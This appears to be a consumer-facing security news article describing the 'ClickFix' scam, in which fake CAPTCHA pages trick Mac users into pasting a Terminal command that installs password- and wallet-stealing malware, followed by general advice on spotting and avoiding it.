Cybersecurity experts have identified a new scam targeting Mac users through fake CAPTCHA pages. The attack, known as ClickFix, tricks users into believing they must verify their identity. However, instead of solving a simple test, victims are asked to run commands on their own devices.
At first glance, the pages look like normal human verification screens. Yet, they instruct users to open Terminal and paste a command. Once executed, the command installs malware on the system.
How the ClickFix Scam Works
The scam spreads through compromised websites, malicious ads, and phishing campaigns. When users land on these pages, they see what appears to be a standard security check.
Instead of selecting images or ticking a box, the page provides step-by-step instructions. It may even copy harmful commands directly to the user’s clipboard. This increases the chance of accidental execution.
Once the command runs, it downloads malware from a remote server. This malware can steal passwords, browser data, and cryptocurrency wallet details.
Rapid Growth of a Dangerous Technique
Security researchers report that ClickFix attacks have surged dramatically. In fact, detections increased by more than 500% between 2024 and 2025.
Initially, attackers focused on Windows systems. However, they now design versions specifically for macOS. Some malicious pages even detect the user’s device and adjust instructions accordingly.
As shown on page 3 of the document, fake CAPTCHA pages guide users with clear steps, making the scam look convincing.
Why Traditional Defenses Fall Short
Unlike typical malware, ClickFix relies on user action rather than software flaws. This makes it harder for security tools to detect.
Because users run the command themselves, the system treats the action as legitimate. Attackers also use built-in tools like Terminal, a method known as “living off the land.”
As a result, many traditional defenses fail to block the attack.
How to Stay Safe
Experts stress that real CAPTCHA systems never ask users to open Terminal or run commands. Any such request is a clear warning sign.
Users should close suspicious pages immediately and avoid interacting with unexpected prompts. Keeping software updated also helps reduce risk.
Ultimately, awareness remains the strongest defense. Since this scam relies on deception, recognizing the signs can prevent serious data loss.
